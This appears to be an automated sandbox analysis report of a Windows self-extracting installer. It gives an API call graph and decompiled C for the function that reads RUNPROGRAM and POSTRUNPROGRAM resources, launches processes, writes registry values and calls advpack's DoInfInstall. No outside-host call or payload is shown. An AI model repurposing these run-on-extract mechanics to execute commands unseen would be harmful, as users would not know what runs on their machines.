2724->2707 2724->2708 2724->2710 2724->2714 2724->2716 2724->2718 2724->2719 2724->2720 2724->2723 2725 1095467 49 API calls 2724->2725 2870 1096952 2724->2870 2725->2724 2727 1096249 2726->2727 2728 1096268 2726->2728 2729 10944b9 20 API calls 2727->2729 2730 109597d 34 API calls 2728->2730 2731 109625a 2729->2731 2732 1096277 2730->2732 2733 1096285 GetLastError 2731->2733 2734 1096ce0 4 API calls 2732->2734 2735 109625f 2733->2735 2736 1093013 2734->2736 2735->2732 2736->2444 2736->2455 2738 1093b2d 2737->2738 2739 1093b72 2738->2739 2740 1093b53 2738->2740 2941 1094fe0 2739->2941 2742 1096517 24 API calls 2740->2742 2743 1093b70 2742->2743 2744 1096298 10 API calls 2743->2744 2745 1093b7b 2743->2745 2744->2745 2745->2460 2747 1092583 2746->2747 2748 1092622 2746->2748 2750 10925e8 RegOpenKeyExA 2747->2750 2751 109258b 2747->2751 2971 10924e0 GetWindowsDirectoryA 2748->2971 2752 1092609 RegQueryInfoKeyA 2750->2752 2753 10925e3 2750->2753 2751->2753 2755 109259b RegOpenKeyExA 2751->2755 2754 10925d1 RegCloseKey 2752->2754 2753->2466 2754->2753 2755->2753 2756 10925bc RegQueryValueExA 2755->2756 2756->2754 2758 1093bdb 2757->2758 2766 1093bec 2757->2766 2759 109468f 7 API calls 2758->2759 2759->2766 2760 1093c03 memset 2760->2766 2761 1093d13 2763 10944b9 20 API calls 2761->2763 2762 109468f 7 API calls 2762->2766 2790 1093d26 2763->2790 2765 1096ce0 4 API calls 2767 1093f60 2765->2767 2766->2760 2766->2761 2766->2762 2768 1093d7b CompareStringA 2766->2768 2769 1093f4d 2766->2769 2770 1093fd7 2766->2770 2772 1093fab 2766->2772 2775 1093f1e LocalFree 2766->2775 2776 1093f46 LocalFree 2766->2776 2780 1093cc7 CompareStringA 2766->2780 2791 1093e10 2766->2791 2979 1091ae8 2766->2979 3019 109202a memset memset RegCreateKeyExA 2766->3019 3045 1093fef 2766->3045 2767->2472 2768->2766 2768->2770 2769->2765 2770->2769 3069 1092267 2770->3069 2774 10944b9 20 API calls 2772->2774 2778 1093fbe LocalFree 2774->2778 2775->2766 2775->2770 2776->2769 2778->2769 2780->2766 2781 
1093e1f GetProcAddress 2784 1093f64 2781->2784 2781->2791 2782 1093f92 2783 10944b9 20 API calls 2782->2783 2785 1093fa9 2783->2785 2786 10944b9 20 API calls 2784->2786 2787 1093f7c LocalFree 2785->2787 2788 1093f75 FreeLibrary 2786->2788 2789 1096285 GetLastError 2787->2789 2788->2787 2789->2790 2790->2769 2791->2781 2791->2782 2792 1093eff FreeLibrary 2791->2792 2793 1093f40 FreeLibrary 2791->2793 3059 1096495 2791->3059 2792->2775 2793->2776 2795 109468f 7 API calls 2794->2795 2796 1093a55 LocalAlloc 2795->2796 2797 1093a6c 2796->2797 2798 1093a8e 2796->2798 2799 10944b9 20 API calls 2797->2799 2800 109468f 7 API calls 2798->2800 2801 1093a7d 2799->2801 2802 1093a98 2800->2802 2803 1096285 GetLastError 2801->2803 2804 1093a9c 2802->2804 2805 1093ac5 lstrcmpA 2802->2805 2811 1092f64 2803->2811 2806 10944b9 20 API calls 2804->2806 2807 1093ada 2805->2807 2808 1093b0d LocalFree 2805->2808 2809 1093aad LocalFree 2806->2809 2810 1096517 24 API calls 2807->2810 2808->2811 2809->2811 2812 1093aec LocalFree 2810->2812 2811->2436 2811->2444 2812->2811 2814 109303c 2813->2814 2814->2444 2816 109468f 7 API calls 2815->2816 2817 109417d LocalAlloc 2816->2817 2818 10941a8 2817->2818 2819 1094195 2817->2819 2820 109468f 7 API calls 2818->2820 2821 10944b9 20 API calls 2819->2821 2822 10941b5 2820->2822 2823 10941a6 2821->2823 2824 10941b9 2822->2824 2825 10941c5 lstrcmpA 2822->2825 2823->2444 2827 10944b9 20 API calls 2824->2827 2825->2824 2826 10941e6 LocalFree 2825->2826 2826->2823 2827->2826 2829 109171e _vsnprintf 2828->2829 2839 10962c9 FindResourceA 2829->2839 2831 10962cb LoadResource LockResource 2832 1096353 2831->2832 2835 10962e0 2831->2835 2833 1096ce0 4 API calls 2832->2833 2834 10951ca 2833->2834 2834->2673 2834->2674 2836 109631b FreeResource 2835->2836 2837 1096355 FreeResource 2835->2837 2838 109171e _vsnprintf 2836->2838 2837->2832 2838->2839 2839->2831 2839->2832 2841 109548a 2840->2841 2859 109551a 2840->2859 2901 10953a1 2841->2901 2843 1095581 2847 
1096ce0 4 API calls 2843->2847 2846 1095495 2846->2843 2850 109550c 2846->2850 2851 10954c2 GetSystemInfo 2846->2851 2852 109559a 2847->2852 2848 109553b CreateDirectoryA 2853 1095577 2848->2853 2854 1095547 2848->2854 2849 109554d 2849->2843 2858 109597d 34 API calls 2849->2858 2855 109658a CharPrevA 2850->2855 2857 10954da 2851->2857 2852->2714 2864 1092630 GetWindowsDirectoryA 2852->2864 2856 1096285 GetLastError 2853->2856 2854->2849 2855->2859 2860 109557c 2856->2860 2857->2850 2862 109658a CharPrevA 2857->2862 2861 109555c 2858->2861 2912 10958c8 2859->2912 2860->2843 2861->2843 2863 1095568 RemoveDirectoryA 2861->2863 2862->2850 2863->2843 2865 109266f 2864->2865 2866 109265e 2864->2866 2868 1096ce0 4 API calls 2865->2868 2867 10944b9 20 API calls 2866->2867 2867->2865 2869 1092687 2868->2869 2869->2700 2869->2715 2871 109696e GetDiskFreeSpaceA 2870->2871 2872 10969a1 2870->2872 2871->2872 2873 1096989 MulDiv 2871->2873 2872->2724 2873->2872 2875 10959bb 2874->2875 2876 10959dd GetDiskFreeSpaceA 2874->2876 2877 10944b9 20 API calls 2875->2877 2878 1095ba1 memset 2876->2878 2879 1095a21 MulDiv 2876->2879 2880 10959cc 2877->2880 2881 1096285 GetLastError 2878->2881 2879->2878 2882 1095a50 GetVolumeInformationA 2879->2882 2883 1096285 GetLastError 2880->2883 2884 1095bbc GetLastError FormatMessageA 2881->2884 2885 1095a6e memset 2882->2885 2886 1095ab5 SetCurrentDirectoryA 2882->2886 2887 10959d1 2883->2887 2888 1095be3 2884->2888 2889 1096285 GetLastError 2885->2889 2895 1095acc 2886->2895 2899 1095b94 2887->2899 2890 10944b9 20 API calls 2888->2890 2891 1095a89 GetLastError FormatMessageA 2889->2891 2893 1095bf5 SetCurrentDirectoryA 2890->2893 2891->2888 2892 1096ce0 4 API calls 2894 1095c11 2892->2894 2893->2899 2894->2700 2896 1095b0a 2895->2896 2898 1095b20 2895->2898 2897 10944b9 20 API calls 2896->2897 2897->2887 2898->2899 2924 109268b 2898->2924 2899->2892 2903 10953bf 2901->2903 2902 109171e _vsnprintf 2902->2903 2903->2902 2904 109658a CharPrevA 
2903->2904 2907 1095415 GetTempFileNameA 2903->2907 2905 10953fa RemoveDirectoryA GetFileAttributesA 2904->2905 2905->2903 2906 109544f CreateDirectoryA 2905->2906 2906->2907 2908 109543a 2906->2908 2907->2908 2909 1095429 DeleteFileA CreateDirectoryA 2907->2909 2910 1096ce0 4 API calls 2908->2910 2909->2908 2911 1095449 2910->2911 2911->2846 2913 10958d8 2912->2913 2913->2913 2914 10958df LocalAlloc 2913->2914 2915 10958f3 2914->2915 2917 1095919 2914->2917 2916 10944b9 20 API calls 2915->2916 2918 1095906 2916->2918 2919 109658a CharPrevA 2917->2919 2920 1096285 GetLastError 2918->2920 2922 1095534 2918->2922 2921 1095931 CreateFileA LocalFree 2919->2921 2920->2922 2921->2918 2923 109595b CloseHandle GetFileAttributesA 2921->2923 2922->2848 2922->2849 2923->2918 2925 10926b9 2924->2925 2926 10926e5 2924->2926 2929 109171e _vsnprintf 2925->2929 2927 10926ea 2926->2927 2928 109271f 2926->2928 2930 109171e _vsnprintf 2927->2930 2931 10926e3 2928->2931 2936 109171e _vsnprintf 2928->2936 2932 10926cc 2929->2932 2935 10926fd 2930->2935 2933 1096ce0 4 API calls 2931->2933 2934 10944b9 20 API calls 2932->2934 2937 109276d 2933->2937 2934->2931 2938 10944b9 20 API calls 2935->2938 2939 1092735 2936->2939 2937->2899 2938->2931 2940 10944b9 20 API calls 2939->2940 2940->2931 2942 109468f 7 API calls 2941->2942 2943 1094ff5 FindResourceA LoadResource LockResource 2942->2943 2944 1095020 2943->2944 2959 109515f 2943->2959 2945 1095029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2944->2945 2946 1095057 2944->2946 2945->2946 2963 1094efd 2946->2963 2949 109507c 2953 10950e8 2949->2953 2957 1095106 2949->2957 2950 1095060 2951 10944b9 20 API calls 2950->2951 2952 1095075 2951->2952 2952->2957 2955 10944b9 20 API calls 2953->2955 2954 1095110 FreeResource 2956 109511d 2954->2956 2955->2952 2958 1095129 2956->2958 2960 109513a 2956->2960 2957->2954 2957->2956 2961 10944b9 20 API calls 2958->2961 2959->2743 2960->2959 2962 109514c SendMessageA 2960->2962 2961->2960 2962->2959 2964 
1094f4a 2963->2964 2965 1094980 25 API calls 2964->2965 2970 1094fa1 2964->2970 2968 1094f67 2965->2968 2966 1096ce0 4 API calls 2967 1094fc6 2966->2967 2967->2949 2967->2950 2969 1094b60 FindCloseChangeNotification 2968->2969 2968->2970 2969->2970 2970->2966 2972 109255b 2971->2972 2973 1092510 2971->2973 2974 1096ce0 4 API calls 2972->2974 2975 109658a CharPrevA 2973->2975 2976 1092569 2974->2976 2977 1092522 WritePrivateProfileStringA _lopen 2975->2977 2976->2753 2977->2972 2978 1092548 _llseek _lclose 2977->2978 2978->2972 2980 1091b25 2979->2980 3083 1091a84 2980->3083 2982 1091b57 2983 109658a CharPrevA 2982->2983 2984 1091b8c 2982->2984 2983->2984 2985 10966c8 2 API calls 2984->2985 2986 1091bd1 2985->2986 2987 1091bd9 CompareStringA 2986->2987 2988 1091d73 2986->2988 2987->2988 2989 1091bf7 GetFileAttributesA 2987->2989 2990 10966c8 2 API calls 2988->2990 2992 1091c0d 2989->2992 2993 1091d53 2989->2993 2991 1091d7d 2990->2991 2994 1091df8 LocalAlloc 2991->2994 2995 1091d81 CompareStringA 2991->2995 2992->2993 2996 1091a84 2 API calls 2992->2996 2999 10944b9 20 API calls 2993->2999 2994->2993 2998 1091e0b GetFileAttributesA 2994->2998 2995->2994 2997 1091d9b LocalAlloc 2995->2997 3001 1091c31 2996->3001 2997->2993 3010 1091de1 2997->3010 3004 1091e1d 2998->3004 3016 1091e45 2998->3016 3017 1091cc2 2999->3017 3000 1091c50 LocalAlloc 3000->2993 3002 1091c67 GetPrivateProfileIntA GetPrivateProfileStringA 3000->3002 3001->3000 3005 1091a84 2 API calls 3001->3005 3011 1091cf8 3002->3011 3002->3017 3003 1096ce0 4 API calls 3009 1091ea1 3003->3009 3004->3016 3005->3000 3009->2766 3015 109171e _vsnprintf 3010->3015 3013 1091d09 GetShortPathNameA 3011->3013 3014 1091d23 3011->3014 3012 1091e89 3012->3003 3013->3014 3018 109171e _vsnprintf 3014->3018 3015->3017 3089 1092aac 3016->3089 3017->3012 3018->3017 3020 109209a 3019->3020 3021 1092256 3019->3021 3023 109171e _vsnprintf 3020->3023 3026 10920dc 3020->3026 3022 1096ce0 4 API calls 3021->3022 3024 1092263 
3022->3024 3025 10920af RegQueryValueExA 3023->3025 3024->2766 3025->3020 3025->3026 3027 10920fb GetSystemDirectoryA 3026->3027 3028 10920e4 RegCloseKey 3026->3028 3029 109658a CharPrevA 3027->3029 3028->3021 3030 109211b LoadLibraryA 3029->3030 3031 1092179 GetModuleFileNameA 3030->3031 3032 109212e GetProcAddress FreeLibrary 3030->3032 3033 10921de RegCloseKey 3031->3033 3037 1092177 3031->3037 3032->3031 3034 109214e GetSystemDirectoryA 3032->3034 3033->3021 3035 1092165 3034->3035 3034->3037 3036 109658a CharPrevA 3035->3036 3036->3037 3037->3037 3038 10921b7 LocalAlloc 3037->3038 3039 10921cd 3038->3039 3040 10921ec 3038->3040 3041 10944b9 20 API calls 3039->3041 3042 109171e _vsnprintf 3040->3042 3041->3033 3043 1092218 RegSetValueExA RegCloseKey LocalFree 3042->3043 3043->3021 3046 1094016 CreateProcessA 3045->3046 3057 1094106 3045->3057 3047 1094041 WaitForSingleObject GetExitCodeProcess 3046->3047 3048 10940c4 3046->3048 3054 1094070 3047->3054 3051 1096285 GetLastError 3048->3051 3049 1096ce0 4 API calls 3050 1094117 3049->3050 3050->2766 3053 10940c9 GetLastError FormatMessageA 3051->3053 3056 10944b9 20 API calls 3053->3056 3116 109411b 3054->3116 3055 1094096 CloseHandle CloseHandle 3055->3057 3058 10940ba 3055->3058 3056->3057 3057->3049 3058->3057 3060 10964c2 3059->3060 3061 109658a CharPrevA 3060->3061 3062 10964d8 GetFileAttributesA 3061->3062 3063 10964ea 3062->3063 3064 1096501 LoadLibraryA 3062->3064 3063->3064 3065 10964ee LoadLibraryExA 3063->3065 3066 1096508 3064->3066 3065->3066 3067 1096ce0 4 API calls 3066->3067 3068 1096513 3067->3068 3068->2791 3070 1092289 RegOpenKeyExA 3069->3070 3071 1092381 3069->3071 3070->3071 3073 10922b1 RegQueryValueExA 3070->3073 3072 1096ce0 4 API calls 3071->3072 3074 109238c 3072->3074 3075 1092374 RegCloseKey 3073->3075 3076 10922e6 memset GetSystemDirectoryA 3073->3076 3074->2769 3075->3071 3077 109230f 3076->3077 3078 1092321 3076->3078 3079 109658a CharPrevA 3077->3079 3080 109171e _vsnprintf 
3078->3080 3079->3078 3081 109233f 3080->3081 3081->3081 3082 1092353 RegSetValueExA 3081->3082 3082->3075 3084 1091a9a 3083->3084 3086 1091aba 3084->3086 3088 1091aaf 3084->3088 3102 109667f 3084->3102 3086->2982 3087 109667f 2 API calls 3087->3088 3088->3086 3088->3087 3090 1092be6 3089->3090 3091 1092ad4 GetModuleFileNameA 3089->3091 3092 1096ce0 4 API calls 3090->3092 3099 1092b02 3091->3099 3094 1092bf5 3092->3094 3093 1092af1 IsDBCSLeadByte 3093->3099 3094->3012 3095 1092bca CharNextA 3097 1092bd3 CharNextA 3095->3097 3096 1092b11 CharNextA CharUpperA 3098 1092b8d CharUpperA 3096->3098 3096->3099 3097->3099 3098->3099 3099->3090 3099->3093 3099->3095 3099->3096 3099->3097 3101 1092b43 CharPrevA 3099->3101 3107 10965e8 3099->3107 3101->3099 3103 1096689 3102->3103 3104 10966a5 3103->3104 3105 1096648 IsDBCSLeadByte 3103->3105 3106 1096697 CharNextA 3103->3106 3104->3084 3105->3103 3106->3103 3108 10965f4 3107->3108 3108->3108 3109 10965fb CharPrevA 3108->3109 3110 1096611 CharPrevA 3109->3110 3111 109660b 3110->3111 3112 109661e 3110->3112 3111->3110 3111->3112 3113 1096634 CharNextA 3112->3113 3114 1096627 CharPrevA 3112->3114 3115 109663d 3112->3115 3113->3115 3114->3113 3114->3115 3115->3099 3117 1094132 3116->3117 3119 109412a 3116->3119 3120 1091ea7 3117->3120 3119->3055 3121 1091ed3 3120->3121 3122 1091eba 3120->3122 3121->3119 3123 109256d 15 API calls 3122->3123 3123->3121 3125 1091ff0 RegOpenKeyExA 3124->3125 3126 1092026 3124->3126 3125->3126 3127 109200f RegDeleteValueA RegCloseKey 3125->3127 3126->2479 3127->3126 3237 1096a20 __getmainargs 3238 10919e0 3239 1091a03 3238->3239 3240 1091a24 GetDesktopWindow 3238->3240 3241 1091a20 3239->3241 3243 1091a16 EndDialog 3239->3243 3242 10943d0 11 API calls 3240->3242 3245 1096ce0 4 API calls 3241->3245 3244 1091a33 LoadStringA SetDlgItemTextA MessageBeep 3242->3244 3243->3241 3244->3241 3246 1091a7e 3245->3246 3247 1097270 _except_handler4_common 3248 10969b0 3249 10969b5 3248->3249 3257 1096fbe 
GetModuleHandleW 3249->3257 3251 10969c1 __set_app_type __p__fmode __p__commode 3252 10969f9 3251->3252 3253 1096a0e 3252->3253 3254 1096a02 __setusermatherr 3252->3254 3259 10971ef _controlfp 3253->3259 3254->3253 3256 1096a13 3258 1096fcf 3257->3258 3258->3251 3259->3256 3260 10934f0 3261 1093504 3260->3261 3262 10935b8 3260->3262 3261->3262 3263 109351b 3261->3263 3264 10935be GetDesktopWindow 3261->3264 3265 1093526 3262->3265 3269 1093671 EndDialog 3262->3269 3267 109354f 3263->3267 3268 109351f 3263->3268 3266 10943d0 11 API calls 3264->3266 3270 10935d6 3266->3270 3267->3265 3272 1093559 ResetEvent 3267->3272 3268->3265 3271 109352d TerminateThread EndDialog 3268->3271 3269->3265 3273 109361d SetWindowTextA CreateThread 3270->3273 3274 10935e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3270->3274 3271->3265 3275 10944b9 20 API calls 3272->3275 3273->3265 3276 1093646 3273->3276 3274->3273 3277 1093581 3275->3277 3278 10944b9 20 API calls 3276->3278 3279 109359b SetEvent 3277->3279 3281 109358a SetEvent 3277->3281 3278->3262 3280 1093680 4 API calls 3279->3280 3280->3262 3281->3265 3282 1096ef0 3283 1096f2d 3282->3283 3284 1096f02 3282->3284 3284->3283 3285 1096f27 ?terminate@ 3284->3285 3285->3283

                                                          Callgraph


                                                          C-Code - Quality: 82%
                                                          			E01093BA2() {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				char _v276;
                                                          				char _v280;
                                                          				short _v300;
                                                          				intOrPtr _v304;
                                                          				void _v348;
                                                          				char _v352;
                                                          				intOrPtr _v356;
                                                          				signed int _v360;
                                                          				short _v364;
                                                          				char* _v368;
                                                          				intOrPtr _v372;
                                                          				void* _v376;
                                                          				intOrPtr _v380;
                                                          				char _v384;
                                                          				signed int _v388;
                                                          				intOrPtr _v392;
                                                          				signed int _v396;
                                                          				signed int _v400;
                                                          				signed int _v404;
                                                          				void* _v408;
                                                          				void* _v424;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t69;
                                                          				signed int _t76;
                                                          				void* _t77;
                                                          				signed int _t79;
                                                          				short _t96;
                                                          				signed int _t97;
                                                          				intOrPtr _t98;
                                                          				signed int _t101;
                                                          				signed int _t104;
                                                          				signed int _t108;
                                                          				int _t112;
                                                          				void* _t115;
                                                          				signed char _t118;
                                                          				void* _t125;
                                                          				signed int _t127;
                                                          				void* _t128;
                                                          				struct HINSTANCE__* _t129;
                                                          				void* _t130;
                                                          				short _t137;
                                                          				char* _t140;
                                                          				signed char _t144;
                                                          				signed char _t145;
                                                          				signed int _t149;
                                                          				void* _t150;
                                                          				void* _t151;
                                                          				signed int _t153;
                                                          				void* _t155;
                                                          				void* _t156;
                                                          				signed int _t157;
                                                          				signed int _t162;
                                                          				signed int _t164;
                                                          				void* _t165;
                                                          
                                                          				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                          				_t69 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t69 ^ _t164;
                                                          				_t153 = 0;
                                                          				 *0x1099124 =  *0x1099124 & 0;
                                                          				_t149 = 0;
                                                          				_v388 = 0;
                                                          				_v384 = 0;
                                                          				_t165 =  *0x1098a28 - _t153; // 0x0
                                                          				if(_t165 != 0) {
                                                          					L3:
                                                          					_t127 = 0;
                                                          					_v392 = 0;
                                                          					while(1) {
                                                          						_v400 = _v400 & 0x00000000;
                                                          						memset( &_v348, 0, 0x44);
                                                          						_t164 = _t164 + 0xc;
                                                          						_v348 = 0x44;
                                                          						if( *0x1098c42 != 0) {
                                                          							goto L26;
                                                          						}
                                                          						_t146 =  &_v396;
                                                          						_t115 = E0109468F("SHOWWINDOW",  &_v396, 4);
                                                          						if(_t115 == 0 || _t115 > 4) {
                                                          							L25:
                                                          							_t146 = 0x4b1;
                                                          							E010944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          							 *0x1099124 = 0x80070714;
                                                          							goto L62;
                                                          						} else {
                                                          							if(_v396 != 1) {
                                                          								__eflags = _v396 - 2;
                                                          								if(_v396 != 2) {
                                                          									_t137 = 3;
                                                          									__eflags = _v396 - _t137;
                                                          									if(_v396 == _t137) {
                                                          										_v304 = 1;
                                                          										_v300 = _t137;
                                                          									}
                                                          									goto L14;
                                                          								}
                                                          								_push(6);
                                                          								_v304 = 1;
                                                          								_pop(0);
                                                          								goto L11;
                                                          							} else {
                                                          								_v304 = 1;
                                                          								L11:
                                                          								_v300 = 0;
                                                          								L14:
                                                          								if(_t127 != 0) {
                                                          									L27:
                                                          									_t155 = 1;
                                                          									__eflags = _t127 - 1;
                                                          									if(_t127 != 1) {
                                                          										L31:
                                                          										_t132 =  &_v280;
                                                          										_t76 = E01091AE8( &_v280,  &_v408,  &_v404); // executed
                                                          										__eflags = _t76;
                                                          										if(_t76 == 0) {
                                                          											L62:
                                                          											_t77 = 0;
                                                          											L63:
                                                          											_pop(_t150);
                                                          											_pop(_t156);
                                                          											_pop(_t128);
                                                          											return E01096CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                          										}
                                                          										_t157 = _v404;
                                                          										__eflags = _t149;
                                                          										if(_t149 != 0) {
                                                          											L37:
                                                          											__eflags = _t157;
                                                          											if(_t157 == 0) {
                                                          												L57:
                                                          												_t151 = _v408;
                                                          												_t146 =  &_v352;
                                                          												_t130 = _t151; // executed
                                                          												_t79 = E01093FEF(_t130,  &_v352); // executed
                                                          												__eflags = _t79;
                                                          												if(_t79 == 0) {
                                                          													L61:
                                                          													LocalFree(_t151);
                                                          													goto L62;
                                                          												}
                                                          												L58:
                                                          												LocalFree(_t151);
                                                          												_t127 = _t127 + 1;
                                                          												_v396 = _t127;
                                                          												__eflags = _t127 - 2;
                                                          												if(_t127 >= 2) {
                                                          													_t155 = 1;
                                                          													__eflags = 1;
                                                          													L69:
                                                          													__eflags =  *0x1098580;
                                                          													if( *0x1098580 != 0) {
                                                          														E01092267();
                                                          													}
                                                          													_t77 = _t155;
                                                          													goto L63;
                                                          												}
                                                          												_t153 = _v392;
                                                          												_t149 = _v388;
                                                          												continue;
                                                          											}
                                                          											L38:
                                                          											__eflags =  *0x1098180;
                                                          											if( *0x1098180 == 0) {
                                                          												_t146 = 0x4c7;
                                                          												E010944B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                          												LocalFree(_v424);
                                                          												 *0x1099124 = 0x8007042b;
                                                          												goto L62;
                                                          											}
                                                          											__eflags = _t157;
                                                          											if(_t157 == 0) {
                                                          												goto L57;
                                                          											}
                                                          											__eflags =  *0x1099a34 & 0x00000004;
                                                          											if(__eflags == 0) {
                                                          												goto L57;
                                                          											}
                                                          											_t129 = E01096495(_t127, _t132, _t157, __eflags);
                                                          											__eflags = _t129;
                                                          											if(_t129 == 0) {
                                                          												_t146 = 0x4c8;
                                                          												E010944B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                          												L65:
                                                          												LocalFree(_v408);
                                                          												 *0x1099124 = E01096285();
                                                          												goto L62;
                                                          											}
                                                          											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                          											_v404 = _t146;
                                                          											__eflags = _t146;
                                                          											if(_t146 == 0) {
                                                          												_t146 = 0x4c9;
                                                          												__eflags = 0;
                                                          												E010944B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                          												FreeLibrary(_t129);
                                                          												goto L65;
                                                          											}
                                                          											__eflags =  *0x1098a30;
                                                          											_t151 = _v408;
                                                          											_v384 = 0;
                                                          											_v368 =  &_v280;
                                                          											_t96 =  *0x1099a40; // 0x3
                                                          											_v364 = _t96;
                                                          											_t97 =  *0x1098a38 & 0x0000ffff;
                                                          											_v380 = 0x1099154;
                                                          											_v376 = _t151;
                                                          											_v372 = 0x10991e4;
                                                          											_v360 = _t97;
                                                          											if( *0x1098a30 != 0) {
                                                          												_t97 = _t97 | 0x00010000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											_t144 =  *0x1099a34; // 0x1
                                                          											__eflags = _t144 & 0x00000008;
                                                          											if((_t144 & 0x00000008) != 0) {
                                                          												_t97 = _t97 | 0x00020000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											__eflags = _t144 & 0x00000010;
                                                          											if((_t144 & 0x00000010) != 0) {
                                                          												_t97 = _t97 | 0x00040000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											_t145 =  *0x1098d48; // 0x0
                                                          											__eflags = _t145 & 0x00000040;
                                                          											if((_t145 & 0x00000040) != 0) {
                                                          												_t97 = _t97 | 0x00080000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											__eflags = _t145;
                                                          											if(_t145 < 0) {
                                                          												_t104 = _t97 | 0x00100000;
                                                          												__eflags = _t104;
                                                          												_v360 = _t104;
                                                          											}
                                                          											_t98 =  *0x1099a38; // 0x0
                                                          											_v356 = _t98;
                                                          											_t130 = _t146;
                                                          											 *0x109a288( &_v384);
                                                          											_t101 = _v404();
                                                          											__eflags = _t164 - _t164;
                                                          											if(_t164 != _t164) {
                                                          												_t130 = 4;
                                                          												asm("int 0x29");
                                                          											}
                                                          											 *0x1099124 = _t101;
                                                          											_push(_t129);
                                                          											__eflags = _t101;
                                                          											if(_t101 < 0) {
                                                          												FreeLibrary();
                                                          												goto L61;
                                                          											} else {
                                                          												FreeLibrary();
                                                          												_t127 = _v400;
                                                          												goto L58;
                                                          											}
                                                          										}
                                                          										__eflags =  *0x1099a40 - 1; // 0x3
                                                          										if(__eflags == 0) {
                                                          											goto L37;
                                                          										}
                                                          										__eflags =  *0x1098a20;
                                                          										if( *0x1098a20 == 0) {
                                                          											goto L37;
                                                          										}
                                                          										__eflags = _t157;
                                                          										if(_t157 != 0) {
                                                          											goto L38;
                                                          										}
                                                          										_v388 = 1;
                                                          										E0109202A(_t146); // executed
                                                          										goto L37;
                                                          									}
                                                          									_t146 =  &_v280;
                                                          									_t108 = E0109468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                          									__eflags = _t108;
                                                          									if(_t108 == 0) {
                                                          										goto L25;
                                                          									}
                                                          									__eflags =  *0x1098c42;
                                                          									if( *0x1098c42 != 0) {
                                                          										goto L69;
                                                          									}
                                                          									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                          									__eflags = _t112 == 0;
                                                          									if(_t112 == 0) {
                                                          										goto L69;
                                                          									}
                                                          									goto L31;
                                                          								}
                                                          								_t118 =  *0x1098a38; // 0x0
                                                          								if(_t118 == 0) {
                                                          									L23:
                                                          									if(_t153 != 0) {
                                                          										goto L31;
                                                          									}
                                                          									_t146 =  &_v276;
                                                          									if(E0109468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                          										goto L27;
                                                          									}
                                                          									goto L25;
                                                          								}
                                                          								if((_t118 & 0x00000001) == 0) {
                                                          									__eflags = _t118 & 0x00000002;
                                                          									if((_t118 & 0x00000002) == 0) {
                                                          										goto L62;
                                                          									}
                                                          									_t140 = "USRQCMD";
                                                          									L20:
                                                          									_t146 =  &_v276;
                                                          									if(E0109468F(_t140,  &_v276, 0x104) == 0) {
                                                          										goto L25;
                                                          									}
                                                          									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                          										_t153 = 1;
                                                          										_v388 = 1;
                                                          									}
                                                          									goto L23;
                                                          								}
                                                          								_t140 = "ADMQCMD";
                                                          								goto L20;
                                                          							}
                                                          						}
                                                          						L26:
                                                          						_push(_t130);
                                                          						_t146 = 0x104;
                                                          						E01091781( &_v276, 0x104, _t130, 0x1098c42);
                                                          						goto L27;
                                                          					}
                                                          				}
                                                          				_t130 = "REBOOT";
                                                          				_t125 = E0109468F(_t130, 0x1099a2c, 4);
                                                          				if(_t125 == 0 || _t125 > 4) {
                                                          					goto L25;
                                                          				} else {
                                                          					goto L3;
                                                          				}
                                                          			}

                                                          APIs
                                                          • memset.MSVCRT ref: 01093C11
                                                          • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 01093CDC
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                            • Part of subcall function 0109468F: SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                            • Part of subcall function 0109468F: LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                            • Part of subcall function 0109468F: LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                            • Part of subcall function 0109468F: memcpy_s.MSVCRT ref: 010946E5
                                                            • Part of subcall function 0109468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
                                                          • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,01098C42), ref: 01093D8F
                                                          • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 01093E26
                                                          • FreeLibrary.KERNEL32(00000000,?,01098C42), ref: 01093EFF
                                                          • LocalFree.KERNEL32(?,?,?,?,01098C42), ref: 01093F1F
                                                          • FreeLibrary.KERNEL32(00000000,?,01098C42), ref: 01093F40
                                                          • LocalFree.KERNEL32(?,?,?,?,01098C42), ref: 01093F47
                                                          • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,01098C42), ref: 01093F76
                                                          • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,01098C42), ref: 01093F80
                                                          • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,01098C42), ref: 01093FC2
                                                          Strings
                                                          Memory Dump Source
